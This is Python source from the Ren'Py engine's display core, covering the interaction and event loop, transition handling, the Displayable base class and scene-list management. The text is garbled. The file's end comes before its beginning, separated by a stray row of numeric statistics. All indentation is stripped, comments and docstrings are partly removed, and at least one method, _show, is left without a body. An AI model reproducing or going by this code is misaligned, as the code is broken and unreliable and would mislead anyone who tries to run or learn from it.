self.ongoing_transition.clear()
self.transition_from.clear()
self.transition_time.clear()
else:
for k in self.transition:
if k not in self.old_scene:
continue
self.ongoing_transition[k] = self.transition[k]
self.transition_from[k] = self.old_scene[k]._in_current_store()
self.transition_time[k] = None
self.transition.clear()
# Safety condition, prevents deadlocks.
if trans_pause:
if not self.ongoing_transition:
return False, None
if None not in self.ongoing_transition:
return False, None
if suppress_transition:
return False, None
if not self.old_scene:
return False, None
# Check to see if the language has changed.
renpy.translation.check_language()
# We just restarted.
self.restart_interaction = False
# Setup the mouse.
self.mouse = mouse
# The start and end times of this interaction.
start_time = get_time()
end_time = start_time
# frames = 0
for i in renpy.config.interact_callbacks:
i()
# Set the window caption.
self.set_window_caption()
# Tick time forward.
renpy.display.im.cache.tick()
renpy.text.text.text_tick()
renpy.display.predict.reset()
# Clear the size groups.
renpy.display.layout.size_groups.clear()
# Clear the set of updated screens.
renpy.display.screen.updated_screens.clear()
# Clear some events.
pygame.event.clear((pygame.MOUSEMOTION,
PERIODIC,
TIMEEVENT,
REDRAW))
# Add a single TIMEEVENT to the queue.
self.post_time_event()
# Figure out the scene list we want to show.
scene_lists = renpy.game.context().scene_lists
# Remove the now-hidden things.
scene_lists.remove_hidden()
# Compute the overlay.
if not suppress_overlay:
self.compute_overlay()
# The root widget of everything that is displayed on the screen.
root_widget = renpy.display.layout.MultiBox(layout='fixed')
root_widget.layers = { }
# A list of widgets that are roots of trees of widgets that are
# considered for focusing.
focus_roots = [ ]
# Add the underlay to the root widget.
if not suppress_underlay:
for i in renpy.config.underlay:
root_widget.add(i)
focus_roots.append(i)
if roll_forward is not None:
rfw = renpy.display.behavior.RollForward(roll_forward)
root_widget.add(rfw)
focus_roots.append(rfw)
# Figure out the scene. (All of the layers, and the root.)
scene = self.compute_scene(scene_lists)
renpy.display.tts.set_root(scene[None])
renpy.plog(1, "computed scene")
# If necessary, load all images here.
for w in scene.itervalues():
try:
renpy.display.predict.displayable(w)
except:
pass
renpy.plog(1, "final predict")
# The root widget of all of the layers.
layers_root = renpy.display.layout.MultiBox(layout='fixed')
layers_root.layers = { }
def add_layer(where, layer):
scene_layer = scene[layer]
focus_roots.append(scene_layer)
if (self.ongoing_transition.get(layer, None) and
not suppress_transition):
trans = self.ongoing_transition[layer](
old_widget=self.transition_from[layer],
new_widget=scene_layer)
if not isinstance(trans, Displayable):
raise Exception("Expected transition to be a displayable, not a %r" % trans)
transition_time = self.transition_time.get(layer, None)
where.add(trans, transition_time, transition_time)
where.layers[layer] = trans
else:
where.layers[layer] = scene_layer
where.add(scene_layer)
# Add layers (perhaps with transitions) to the layers root.
for layer in renpy.config.layers:
add_layer(layers_root, layer)
# Add layers_root to root_widget, perhaps through a transition.
if (self.ongoing_transition.get(None, None) and
not suppress_transition):
old_root = renpy.display.layout.MultiBox(layout='fixed')
old_root.layers = { }
for layer in renpy.config.layers:
d = self.transition_from[None].layers[layer]
old_root.layers[layer] = d
old_root.add(d)
trans = self.ongoing_transition[None](
old_widget=old_root,
new_widget=layers_root)
if not isinstance(trans, Displayable):
raise Exception("Expected transition to be a displayable, not a %r" % trans)
trans._show()
transition_time = self.transition_time.get(None, None)
root_widget.add(trans, transition_time, transition_time)
if trans_pause:
if renpy.store._dismiss_pause:
sb = renpy.display.behavior.SayBehavior()
else:
sb = renpy.display.behavior.SayBehavior(dismiss='dismiss_hard_pause')
root_widget.add(sb)
focus_roots.append(sb)
pb = renpy.display.behavior.PauseBehavior(trans.delay)
root_widget.add(pb, transition_time, transition_time)
focus_roots.append(pb)
else:
root_widget.add(layers_root)
# Add top_layers to the root_widget.
for layer in renpy.config.top_layers:
add_layer(root_widget, layer)
for i in renpy.display.emulator.overlay:
root_widget.add(i)
del add_layer
self.prediction_coroutine = renpy.display.predict.prediction_coroutine(root_widget)
self.prediction_coroutine.send(None)
# Clean out the registered adjustments.
renpy.display.behavior.adj_registered.clear()
# Clean up some movie-related things.
renpy.display.video.early_interact()
# Call per-interaction code for all widgets.
renpy.display.behavior.input_pre_per_interact()
root_widget.visit_all(lambda i : i.per_interact())
renpy.display.behavior.input_post_per_interact()
# Now, update various things regarding scenes and transitions,
# so we are ready for a new interaction or a restart.
self.old_scene = scene
# Okay, from here on we now have a single root widget (root_widget),
# which we will try to show to the user.
# Figure out what should be focused.
renpy.display.focus.before_interact(focus_roots)
# Something updated the screens. Deal with it now, so the player doesn't
# see it.
if self.restart_interaction:
return True, None
# Redraw the screen.
needs_redraw = True
# First pass through the while loop?
first_pass = True
# We don't yet know when the interaction began.
self.interact_time = None
# We only want to do autosave once.
self.did_autosave = False
old_timeout_time = None
old_redraw_time = None
rv = None
# Start sound.
renpy.audio.audio.interact()
# How long until we redraw.
_redraw_in = 3600
# Have we drawn a frame yet?
video_frame_drawn = False
# We're no longer after rollback.
renpy.game.after_rollback = False
# How many frames have we shown so far?
frame = 0
can_block = False
# This try block is used to force cleanup even on termination
# caused by an exception propagating through this function.
try:
while rv is None:
renpy.plog(1, "start of interact while loop")
renpy.execution.not_infinite_loop(10)
# Check for a change in fullscreen preference.
if ((self.fullscreen != renpy.game.preferences.fullscreen) or
self.display_reset or (renpy.display.draw is None)):
self.set_mode()
needs_redraw = True
# Check for autoreload.
if renpy.loader.needs_autoreload:
renpy.loader.needs_autoreload = False
renpy.exports.reload_script()
for i in renpy.config.needs_redraw_callbacks:
if i():
needs_redraw = True
# Redraw the screen.
if (self.force_redraw or
((first_pass or not pygame.event.peek(ALL_EVENTS)) and
renpy.display.draw.should_redraw(needs_redraw, first_pass, can_block))):
self.force_redraw = False
renpy.display.render.process_redraws()
# If we have a movie, start showing it.
fullscreen_video = renpy.display.video.interact()
# Clean out the redraws, if we have to.
# renpy.display.render.kill_redraws()
self.text_rect = None
# Draw the screen.
self.frame_time = get_time()
renpy.audio.audio.advance_time() # Sets the time of all video frames.
self.draw_screen(root_widget, fullscreen_video, (not fullscreen_video) or video_frame_drawn)
if first_pass:
if not self.interact_time:
self.interact_time = max(self.frame_time, get_time() - self.frame_duration)
scene_lists.set_times(self.interact_time)
for k, v in self.transition_time.iteritems():
if v is None:
self.transition_time[k] = self.interact_time
renpy.display.render.adjust_render_cache_times(self.frame_time, self.interact_time)
frame += 1
renpy.config.frames += 1
# If profiling is enabled, report the profile time.
if renpy.config.profile or self.profile_once:
renpy.plog(0, "end frame")
renpy.performance.analyze()
renpy.performance.clear()
renpy.plog(0, "start frame")
self.profile_once = False
if first_pass and self.last_event and self.last_event.type in [ pygame.MOUSEBUTTONDOWN, pygame.MOUSEBUTTONUP, pygame.MOUSEMOTION ]:
x, y = renpy.display.draw.get_mouse_pos()
ev, x, y = renpy.display.emulator.emulator(self.last_event, x, y)
if self.ignore_touch:
x = -1
y = -1
if renpy.android and self.last_event.type == pygame.MOUSEBUTTONUP:
x = -1
y = -1
renpy.display.focus.mouse_handler(None, x, y, default=False)
needs_redraw = False
first_pass = False
pygame.time.set_timer(REDRAW, 0)
pygame.event.clear([REDRAW])
old_redraw_time = None
self.update_text_rect()
renpy.test.testexecution.execute()
# Move the mouse, if necessary.
if self.mouse_move is not None:
if not self.mouse_move.perform():
self.mouse_move = None
# Draw the mouse, if it needs drawing.
renpy.display.draw.update_mouse()
# See if we want to restart the interaction entirely.
if self.restart_interaction:
return True, None
# Determine if we need a redraw. (We want to run these
# functions, so we put them first to prevent short-circuiting.)
if renpy.display.video.frequent():
needs_redraw = True
video_frame_drawn = True
if renpy.display.render.check_redraws():
needs_redraw = True
# How many seconds until we timeout.
_timeout_in = 3600
# Handle the redraw timer.
redraw_time = renpy.display.render.redraw_time()
# We only need to set the REDRAW timer if we can block.
can_block = renpy.display.draw.can_block()
if self.maximum_framerate_time > get_time():
can_block = False
if (redraw_time is not None) and (not needs_redraw) and can_block:
if redraw_time != old_redraw_time:
time_left = redraw_time - get_time()
time_left = min(time_left, 3600)
_redraw_in = time_left
if time_left <= 0:
try:
pygame.event.post(self.redraw_event)
except:
pass
pygame.time.set_timer(REDRAW, 0)
else:
pygame.time.set_timer(REDRAW, max(int(time_left * 1000), 1))
old_redraw_time = redraw_time
else:
_redraw_in = 3600
pygame.time.set_timer(REDRAW, 0)
# Handle the timeout timer.
if not self.timeout_time:
pygame.time.set_timer(TIMEEVENT, 0)
else:
time_left = self.timeout_time - get_time()
time_left = min(time_left, 3600)
_timeout_in = time_left
if time_left <= 0:
self.timeout_time = None
pygame.time.set_timer(TIMEEVENT, 0)
self.post_time_event()
elif self.timeout_time != old_timeout_time:
# Always set to at least 1ms.
pygame.time.set_timer(TIMEEVENT, int(time_left * 1000 + 1))
old_timeout_time = self.timeout_time
if can_block or (frame >= renpy.config.idle_frame):
expensive = not ( needs_redraw or (_redraw_in < .2) or (_timeout_in < .2) or renpy.display.video.playing() )
self.idle_frame(can_block, expensive)
if needs_redraw or (not can_block) or self.mouse_move or renpy.display.video.playing():
renpy.plog(1, "pre peek")
ev = self.event_poll()
renpy.plog(1, "post peek {!r}", ev)
else:
renpy.plog(1, "pre wait")
ev = self.event_wait()
renpy.plog(1, "post wait {!r}", ev)
if ev.type == pygame.NOEVENT:
if can_block and (not needs_redraw) and (not self.prediction_coroutine) and (not self.mouse_move):
pygame.time.wait(1)
continue
# Recognize and ignore AltGr on Windows.
if ev.type == pygame.KEYDOWN:
if ev.key == pygame.K_LCTRL:
ev2 = self.event_peek()
if (ev2 is not None) and (ev2.type == pygame.KEYDOWN):
if ev2.key == pygame.K_RALT:
continue
# Check to see if the OS is asking us to suspend (on Android
# and iOS.)
if self.check_suspend(ev):
continue
# Try to merge an TIMEEVENT with other timeevents.
if ev.type == TIMEEVENT:
old_timeout_time = None
pygame.event.clear([TIMEEVENT])
# On Android, where we have multiple mouse buttons, we can
# merge a mouse down and mouse up event with its successor. This
# prevents us from getting overwhelmed with too many events on
# a multitouch screen.
if android and (ev.type == pygame.MOUSEBUTTONDOWN or ev.type == pygame.MOUSEBUTTONUP):
pygame.event.clear(ev.type)
# Handle redraw timeouts.
if ev.type == REDRAW:
pygame.event.clear([REDRAW])
old_redraw_time = None
continue
# Handle periodic events. This includes updating the mouse timers (and through the loop,
# the mouse itself), and the audio system periodic calls.
if ev.type == PERIODIC:
events = 1 + len(pygame.event.get([PERIODIC]))
self.ticks += events
for i in renpy.config.periodic_callbacks:
i()
renpy.audio.audio.periodic()
renpy.display.tts.periodic()
continue
# Handle quit specially for now.
if ev.type == pygame.QUIT:
self.quit_event()
continue
# Ignore KEY-events while text is being edited (usually with an IME).
if ev.type == pygame.TEXTEDITING:
if ev.text:
self.text_editing = ev
else:
self.text_editing = None
elif ev.type == pygame.TEXTINPUT:
self.text_editing = None
elif self.text_editing and ev.type in [ pygame.KEYDOWN, pygame.KEYUP ]:
continue
if ev.type == pygame.VIDEOEXPOSE:
# Needed to force the display to redraw after expose in
# the software renderer.
renpy.game.interface.full_redraw = True
renpy.game.interface.force_redraw = True
if isinstance(renpy.display.draw, renpy.display.swdraw.SWDraw):
renpy.display.draw.full_redraw = True
continue
# Handle videoresize.
if ev.type == pygame.VIDEORESIZE:
evs = pygame.event.get([pygame.VIDEORESIZE])
if len(evs):
ev = evs[-1]
# We seem to get a spurious event like this when leaving
# fullscreen mode on windows.
if ev.w < 256 or ev.h < 256:
continue
size = (ev.w // self.dpi_scale, ev.h // self.dpi_scale)
# Refresh fullscreen status (e.g. user pressed Esc. in browser)
main_window = pygame.display.get_window()
self.fullscreen = main_window is not None and bool(main_window.get_window_flags() & (pygame.WINDOW_FULLSCREEN_DESKTOP|pygame.WINDOW_FULLSCREEN))
renpy.game.preferences.fullscreen = self.fullscreen
if pygame.display.get_surface().get_size() != ev.size:
self.set_mode(size)
if not self.fullscreen:
self.last_resize = size
continue
# If we're ignoring touch events, and get a mouse up, stop
# ignoring those events.
if self.ignore_touch and \
ev.type == pygame.MOUSEBUTTONUP and \
ev.button == 1:
self.ignore_touch = False
continue
# Merge mousemotion events.
if ev.type == pygame.MOUSEMOTION:
evs = pygame.event.get([pygame.MOUSEMOTION])
if len(evs):
ev = evs[-1]
if renpy.windows:
self.mouse_focused = True
# Handle mouse event time, and ignoring touch.
if ev.type == pygame.MOUSEMOTION or \
ev.type == pygame.MOUSEBUTTONDOWN or \
ev.type == pygame.MOUSEBUTTONUP:
self.mouse_event_time = renpy.display.core.get_time()
if self.ignore_touch:
renpy.display.focus.mouse_handler(None, -1, -1, default=False)
# Handle focus notifications.
if ev.type == pygame.ACTIVEEVENT:
if ev.state & 1:
if not ev.gain:
renpy.display.focus.clear_focus()
self.mouse_focused = ev.gain
if ev.state & 2:
self.keyboard_focused = ev.gain
if ev.state & 4:
if ev.gain:
self.restored()
else:
self.iconified()
pygame.key.set_mods(0)
# This returns the event location. It also updates the
# mouse state as necessary.
x, y = renpy.display.draw.mouse_event(ev)
x, y = renpy.test.testmouse.get_mouse_pos(x, y)
ev, x, y = renpy.display.emulator.emulator(ev, x, y)
if ev is None:
continue
if not self.mouse_focused or self.ignore_touch:
x = -1
y = -1
# This can set the event to None, to ignore it.
ev = renpy.display.controller.event(ev)
if not ev:
continue
# Handle skipping.
renpy.display.behavior.skipping(ev)
self.event_time = end_time = get_time()
try:
if self.touch:
renpy.display.gesture.recognizer.event(ev, x, y) # @UndefinedVariable
# Handle the event normally.
rv = renpy.display.focus.mouse_handler(ev, x, y)
if rv is None:
rv = root_widget.event(ev, x, y, 0)
if rv is None:
rv = renpy.display.focus.key_handler(ev)
if rv is not None:
break
# Handle displayable inspector.
if renpy.config.inspector:
if renpy.display.behavior.map_event(ev, "inspector"):
l = self.surftree.main_displayables_at_point(x, y, renpy.config.transient_layers + renpy.config.context_clear_layers + renpy.config.overlay_layers)
renpy.game.invoke_in_new_context(renpy.config.inspector, l)
elif renpy.display.behavior.map_event(ev, "full_inspector"):
l = self.surftree.main_displayables_at_point(x, y, renpy.config.layers)
renpy.game.invoke_in_new_context(renpy.config.inspector, l)
except IgnoreEvent:
# An ignored event can change the timeout. So we want to
# process an TIMEEVENT to ensure that the timeout is
# set correctly
if ev.type != TIMEEVENT:
self.post_time_event()
# Check again after handling the event.
needs_redraw |= renpy.display.render.check_redraws()
if self.restart_interaction:
return True, None
# If we were trans-paused and rv is true, suppress
# transitions up to the next interaction.
if trans_pause and rv:
self.suppress_transition = True
# But wait, there's more! The finally block runs some cleanup
# after this.
return False, rv
except EndInteraction as e:
return False, e.value
finally:
renpy.game.context().say_attributes = None
# Clean out the overlay layers.
for i in renpy.config.overlay_layers:
scene_lists.clear(i)
# Stop ongoing preloading.
renpy.display.im.cache.end_tick()
# We no longer disable periodic between interactions.
# pygame.time.set_timer(PERIODIC, 0)
pygame.time.set_timer(TIMEEVENT, 0)
pygame.time.set_timer(REDRAW, 0)
self.consider_gc()
renpy.game.context().runtime += end_time - start_time
# Restart the old interaction, which also causes a
# redraw if needed.
self.restart_interaction = True
renpy.plog(1, "end interact_core")
# print("It took", frames, "frames.")
def timeout(self, offset):
if offset < 0:
return
if self.timeout_time:
self.timeout_time = min(self.event_time + offset, self.timeout_time)
else:
self.timeout_time = self.event_time + offset
def finish_pending(self):
"""
Called before a quit or restart to finish any pending work that might
block other threads.
"""
self.check_background_screenshot()
| 29.801997 | 175 | 0.56845 |
from __future__ import print_function
import renpy.display
import renpy.audio
import renpy.text
import renpy.test
import pygame_sdl2 as pygame
import sys
import os
import time
import cStringIO
import threading
import copy
import gc
import inspect
import_time = time.time()
try:
import android
except:
android = None
TIMEEVENT = pygame.event.register("TIMEEVENT")
PERIODIC = pygame.event.register("PERIODIC")
REDRAW = pygame.event.register("REDRAW")
EVENTNAME = pygame.event.register("EVENTNAME")
ALL_EVENTS = set(pygame.event.get_standard_events())
ALL_EVENTS.add(PERIODIC)
ALL_EVENTS.add(EVENTNAME)
enabled_events = {
pygame.QUIT,
pygame.APP_TERMINATING,
pygame.APP_LOWMEMORY,
pygame.APP_WILLENTERBACKGROUND,
pygame.APP_DIDENTERBACKGROUND,
pygame.APP_WILLENTERFOREGROUND,
pygame.APP_DIDENTERFOREGROUND,
pygame.WINDOWEVENT,
pygame.SYSWMEVENT,
pygame.KEYDOWN,
pygame.KEYUP,
pygame.TEXTEDITING,
pygame.TEXTINPUT,
pygame.MOUSEMOTION,
pygame.MOUSEBUTTONDOWN,
pygame.MOUSEBUTTONUP,
pygame.MOUSEWHEEL,
pygame.JOYAXISMOTION,
pygame.JOYHATMOTION,
pygame.JOYBALLMOTION,
pygame.JOYBUTTONDOWN,
pygame.JOYBUTTONUP,
pygame.JOYDEVICEADDED,
pygame.JOYDEVICEREMOVED,
pygame.CONTROLLERAXISMOTION,
pygame.CONTROLLERBUTTONDOWN,
pygame.CONTROLLERBUTTONUP,
pygame.CONTROLLERDEVICEADDED,
pygame.CONTROLLERDEVICEREMOVED,
pygame.RENDER_TARGETS_RESET,
TIMEEVENT,
PERIODIC,
REDRAW,
EVENTNAME,
}
PERIODIC_INTERVAL = 50
time_base = 0.0
time_mult = 1.0
def init_time():
warp = os.environ.get("RENPY_TIMEWARP", "1.0")
global time_base
global time_mult
time_base = time.time()
time_mult = float(warp)
def get_time():
t = time.time()
return time_base + (t - time_base) * time_mult
def displayable_by_tag(layer, tag):
return renpy.game.context().scene_lists.get_displayable_by_tag(layer, tag)
class IgnoreEvent(Exception):
pass
class EndInteraction(Exception):
def __init__(self, value):
self.value = value
class absolute(float):
__slots__ = [ ]
def place(width, height, sw, sh, placement):
xpos, ypos, xanchor, yanchor, xoffset, yoffset, _subpixel = placement
if xpos is None:
xpos = 0
if ypos is None:
ypos = 0
if xanchor is None:
xanchor = 0
if yanchor is None:
yanchor = 0
if xoffset is None:
xoffset = 0
if yoffset is None:
yoffset = 0
if xpos.__class__ is float:
xpos *= width
if xanchor.__class__ is float:
xanchor *= sw
x = xpos + xoffset - xanchor
if ypos.__class__ is float:
ypos *= height
if yanchor.__class__ is float:
yanchor *= sh
y = ypos + yoffset - yanchor
return x, y
class DisplayableArguments(renpy.object.Object):
name = ()
args = ()
prefix = None
lint = False
def copy(self, **kwargs):
rv = DisplayableArguments()
rv.__dict__.update(self.__dict__)
rv.__dict__.update(kwargs)
return rv
def extraneous(self):
if renpy.config.developer and renpy.config.report_extraneous_attributes:
raise Exception("Image '{}' does not accept attributes '{}'.".format(
" ".join(self.name),
" ".join(self.args),
))
default_style = renpy.style.Style("default")
class Displayable(renpy.object.Object):
# assume anything.
# If True this displayable can accept focus.
# If False, it can't, but it keeps its place in the focus order.
focusable = None
full_focus_name = None
role = ''
transform_event = None
# Can we change our look in response to transform_events?
transform_event_responder = False
# The main displayable, if this displayable is the root of a composite
# displayable. (This is used by SL to figure out where to add children
# to.) If None, it is itself.
_main = None
# A list of the children that make up this composite displayable.
_composite_parts = [ ]
# The location the displayable was created at, if known.
_location = None
# Does this displayable use the scope?
_uses_scope = False
# Arguments supplied to this displayable.
_args = DisplayableArguments()
# Set to true of the displayable is duplicatable (has a non-trivial
# duplicate method), or one of its children is.
_duplicatable = False
# Does this displayable require clipping?
_clipping = False
# Does this displayable have a tooltip?
_tooltip = None
def __ne__(self, o):
return not (self == o)
def __init__(self, focus=None, default=False, style='default', _args=None, tooltip=None, default_focus=False, **properties):
global default_style
if (style == "default") and (not properties):
self.style = default_style
else:
self.style = renpy.style.Style(style, properties) # @UndefinedVariable
self.focus_name = focus
self.default = default or default_focus
self._tooltip = tooltip
if _args is not None:
self._args = _args
def _copy(self, args=None):
rv = copy.copy(self)
if args is not None:
rv._args = args
return rv
def _duplicate(self, args):
if args and args.args:
args.extraneous()
return self
def _get_tooltip(self):
return self._tooltip
def _in_current_store(self):
return self
def _unique(self):
return
def parameterize(self, name, parameters):
a = self._args.copy(name=name, args=parameters)
return self._duplicate(a)
def _equals(self, o):
if type(self) is not type(o):
return False
if self.focus_name != o.focus_name:
return False
if self.style != o.style:
return False
if self.default != o.default:
return False
return True
def __unicode__(self):
return self.__class__.__name__
def __repr__(self):
return "<{} at {:x}>".format(unicode(self).encode("utf-8"), id(self))
def find_focusable(self, callback, focus_name):
focus_name = self.focus_name or focus_name
if self.focusable:
callback(self, focus_name)
elif self.focusable is not None:
callback(None, focus_name)
for i in self.visit():
if i is None:
continue
i.find_focusable(callback, focus_name)
def focus(self, default=False):
self.set_style_prefix(self.role + "hover_", True)
if not default:
renpy.exports.play(self.style.hover_sound)
def unfocus(self, default=False):
self.set_style_prefix(self.role + "idle_", True)
def is_focused(self):
if renpy.display.focus.grab and renpy.display.focus.grab is not self:
return
return renpy.game.context().scene_lists.focused is self
def set_style_prefix(self, prefix, root):
if prefix == self.style.prefix:
return
self.style.set_prefix(prefix)
renpy.display.render.redraw(self, 0)
def render(self, width, height, st, at):
raise Exception("Render not implemented.")
def event(self, ev, x, y, st):
return None
def get_placement(self):
return self.style.get_placement()
def visit_all(self, callback, seen=None):
if seen is None:
seen = set()
for d in self.visit():
if d is None:
continue
id_d = id(d)
if id_d in seen:
continue
seen.add(id_d)
d.visit_all(callback, seen)
callback(self)
def visit(self):
return [ ]
def per_interact(self):
return None
def predict_one(self):
return
def predict_one_action(self):
return
def place(self, dest, x, y, width, height, surf, main=True):
placement = self.get_placement()
subpixel = placement[6]
xpos, ypos = place(width, height, surf.width, surf.height, placement)
xpos += x
ypos += y
pos = (xpos, ypos)
if dest is not None:
if subpixel:
dest.subpixel_blit(surf, pos, main, main, None)
else:
dest.blit(surf, pos, main, main, None)
return pos
def set_transform_event(self, event):
if event == self.transform_event:
return
self.transform_event = event
if self.transform_event_responder:
renpy.display.render.redraw(self, 0)
def _handles_event(self, event):
return False
def _hide(self, st, at, kind):
return None
def _show(self):
def _target(self):
return self
def _change_transform_child(self, child):
return child
def _clear(self):
return
def _tts_common(self, default_alt=None):
rv = [ ]
for i in self.visit():
if i is not None:
speech = i._tts()
if speech.strip():
rv.append(speech)
rv = ": ".join(rv)
rv = rv.replace("::", ":")
rv = rv.replace(": :", ":")
alt = self.style.alt
if alt is None:
alt = default_alt
if alt is not None:
rv = renpy.substitutions.substitute(alt, scope={ "text" : rv })[0]
return rv
def _tts(self):
return self._tts_common()
def _tts_all(self):
return self._tts_common()
class SceneListEntry(renpy.object.Object):
def __init__(self, tag, zorder, show_time, animation_time, displayable, name):
self.tag = tag
self.zorder = zorder
self.show_time = show_time
self.animation_time = animation_time
self.displayable = displayable
self.name = name
def __iter__(self):
return iter((self.tag, self.zorder, self.show_time, self.animation_time, self.displayable))
def __getitem__(self, index):
return (self.tag, self.zorder, self.show_time, self.animation_time, self.displayable)[index]
def __repr__(self):
return "<SLE: %r %r %r>" % (self.tag, self.name, self.displayable)
def copy(self):
return SceneListEntry(
self.tag,
self.zorder,
self.show_time,
self.animation_time,
self.displayable,
self.name)
def update_time(self, time):
rv = self
if self.show_time is None or self.animation_time is None:
rv = self.copy()
rv.show_time = rv.show_time or time
rv.animation_time = rv.animation_time or time
return rv
class SceneLists(renpy.object.Object):
__version__ = 7
def after_setstate(self):
for i in renpy.config.layers + renpy.config.top_layers:
if i not in self.layers:
self.layers[i] = [ ]
self.at_list[i] = { }
self.layer_at_list[i] = (None, [ ])
def after_upgrade(self, version):
if version < 1:
self.at_list = { }
self.layer_at_list = { }
for i in renpy.config.layers + renpy.config.top_layers:
self.at_list[i] = { }
self.layer_at_list[i] = (None, [ ])
if version < 3:
self.shown_window = False
if version < 4:
for k in self.layers:
self.layers[k] = [ SceneListEntry(*(i + (None,)) ) for i in self.layers[k] ]
self.additional_transient = [ ]
if version < 5:
self.drag_group = None
if version < 6:
self.shown = self.image_predict_info
if version < 7:
self.layer_transform = { }
def __init__(self, oldsl, shown):
super(SceneLists, self).__init__()
# Has a window been shown as part of these scene lists?
self.shown_window = False
# A map from layer name -> list(SceneListEntry)
self.layers = { }
# A map from layer name -> tag -> at_list associated with that tag.
self.at_list = { }
# A map from layer to (star time, at_list), where the at list has
# been applied to the layer as a whole.
self.layer_at_list = { }
# The current shown images,
self.shown = shown
# A list of (layer, tag) pairs that are considered to be
# transient.
self.additional_transient = [ ]
# Either None, or a DragGroup that's used as the default for
self.drag_group = None
self.layer_transform = { }
if oldsl:
for i in renpy.config.layers + renpy.config.top_layers:
try:
self.layers[i] = oldsl.layers[i][:]
except KeyError:
self.layers[i] = [ ]
if i in oldsl.at_list:
self.at_list[i] = oldsl.at_list[i].copy()
self.layer_at_list[i] = oldsl.layer_at_list[i]
else:
self.at_list[i] = { }
self.layer_at_list[i] = (None, [ ])
for i in renpy.config.overlay_layers:
self.clear(i)
self.replace_transient(prefix=None)
self.focused = None
self.drag_group = oldsl.drag_group
self.layer_transform.update(oldsl.layer_transform)
else:
for i in renpy.config.layers + renpy.config.top_layers:
self.layers[i] = [ ]
self.at_list[i] = { }
self.layer_at_list[i] = (None, [ ])
self.music = None
self.focused = None
def replace_transient(self, prefix="hide"):
for i in renpy.config.transient_layers:
self.clear(i, True)
for layer, tag in self.additional_transient:
self.remove(layer, tag, prefix=prefix)
self.additional_transient = [ ]
def transient_is_empty(self):
for i in renpy.config.transient_layers:
if self.layers[i]:
return False
return True
def transform_state(self, old_thing, new_thing, execution=False):
if old_thing is None:
return new_thing
if isinstance(new_thing, renpy.display.screen.ScreenDisplayable):
return new_thing
if renpy.config.take_state_from_target:
old_transform = old_thing._target()
else:
old_transform = old_thing
if not isinstance(old_transform, renpy.display.motion.Transform):
return new_thing
if renpy.config.take_state_from_target:
new_transform = new_thing._target()
else:
new_transform = new_thing
if not isinstance(new_transform, renpy.display.motion.Transform):
new_thing = new_transform = renpy.display.motion.Transform(child=new_thing)
new_transform.take_state(old_transform)
if execution:
new_transform.take_execution_state(old_transform)
return new_thing
def find_index(self, layer, tag, zorder, behind):
add_index = None
remove_index = None
for i, sle in enumerate(self.layers[layer]):
if remove_index is None:
if (sle.tag and sle.tag == tag) or sle.displayable == tag:
remove_index = i
if zorder is None:
zorder = sle.zorder
if zorder is None:
zorder = renpy.config.tag_zorder.get(tag, 0)
for i, sle in enumerate(self.layers[layer]):
if add_index is None:
if sle.zorder == zorder:
if sle.tag and (sle.tag == tag or sle.tag in behind):
add_index = i
elif sle.zorder > zorder:
add_index = i
if add_index is None:
add_index = len(self.layers[layer])
return add_index, remove_index, zorder
def add(self,
layer,
thing,
key=None,
zorder=0,
behind=[ ],
at_list=[ ],
name=None,
atl=None,
default_transform=None,
transient=False,
keep_st=False):
if not isinstance(thing, Displayable):
raise Exception("Attempting to show something that isn't a displayable:" + repr(thing))
if layer not in self.layers:
raise Exception("Trying to add something to non-existent layer '%s'." % layer)
if key:
self.remove_hide_replaced(layer, key)
self.at_list[layer][key] = at_list
if key and name:
self.shown.predict_show(layer, name)
if transient:
self.additional_transient.append((layer, key))
l = self.layers[layer]
if atl:
thing = renpy.display.motion.ATLTransform(atl, child=thing)
add_index, remove_index, zorder = self.find_index(layer, key, zorder, behind)
at = None
st = None
if remove_index is not None:
sle = l[remove_index]
old = sle.displayable
at = sle.animation_time
if keep_st:
st = sle.show_time
if (not atl and
not at_list and
renpy.config.keep_running_transform and
isinstance(old, renpy.display.motion.Transform)):
thing = sle.displayable._change_transform_child(thing)
else:
thing = self.transform_state(l[remove_index].displayable, thing)
thing.set_transform_event("replace")
thing._show()
else:
if not isinstance(thing, renpy.display.motion.Transform):
thing = self.transform_state(default_transform, thing)
thing.set_transform_event("show")
thing._show()
sle = SceneListEntry(key, zorder, st, at, thing, name)
l.insert(add_index, sle)
if remove_index is not None:
if add_index <= remove_index:
remove_index += 1
self.hide_or_replace(layer, remove_index, "replaced")
def hide_or_replace(self, layer, index, prefix):
if index is None:
return
l = self.layers[layer]
oldsle = l[index]
now = get_time()
st = oldsle.show_time or now
at = oldsle.animation_time or now
if renpy.config.fast_unhandled_event:
if not oldsle.displayable._handles_event(prefix):
prefix = None
if (prefix is not None) and oldsle.tag:
d = oldsle.displayable._hide(now - st, now - at, prefix)
# _hide can mutate the layers, so we need to recompute
# index.
index = l.index(oldsle)
if d is not None:
sle = SceneListEntry(
prefix + "$" + oldsle.tag,
oldsle.zorder,
st,
at,
d,
None)
l[index] = sle
return
l.pop(index)
def get_all_displayables(self):
rv = [ ]
for l in self.layers.itervalues():
for sle in l:
rv.append(sle.displayable)
return rv
def remove_above(self, layer, thing):
for i in reversed(xrange(len(self.layers[layer]))):
sle = self.layers[layer][i]
if thing:
if sle.tag == thing or sle.displayable == thing:
break
if sle.tag and "$" in sle.tag:
continue
self.hide_or_replace(layer, i, "hide")
def remove(self, layer, thing, prefix="hide"):
if layer not in self.layers:
raise Exception("Trying to remove something from non-existent layer '%s'." % layer)
_add_index, remove_index, _zorder = self.find_index(layer, thing, 0, [ ])
if remove_index is not None:
tag = self.layers[layer][remove_index].tag
if tag:
self.shown.predict_hide(layer, (tag,))
self.at_list[layer].pop(tag, None)
self.hide_or_replace(layer, remove_index, prefix)
def clear(self, layer, hide=False):
if layer not in self.layers:
return
if not hide:
self.layers[layer] = [ ]
else:
# Have to iterate in reverse order, since otherwise
# the indexes might change.
for i in reversed(xrange(len(self.layers[layer]))):
self.hide_or_replace(layer, i, hide)
self.at_list[layer].clear()
self.shown.predict_scene(layer)
self.layer_at_list[layer] = (None, [ ])
def set_layer_at_list(self, layer, at_list, reset=True):
self.layer_at_list[layer] = (None, list(at_list))
if reset:
self.layer_transform[layer] = None
def set_times(self, time):
for l, (t, list) in self.layer_at_list.items(): # @ReservedAssignment
self.layer_at_list[l] = (t or time, list)
for l, ll in self.layers.iteritems():
self.layers[l] = [ i.update_time(time) for i in ll ]
def showing(self, layer, name):
return self.shown.showing(layer, name)
def get_showing_tags(self, layer):
return self.shown.get_showing_tags(layer)
def get_sorted_tags(self, layer):
rv = [ ]
for sle in self.layers[layer]:
if not sle.tag:
continue
if "$" in sle.tag:
continue
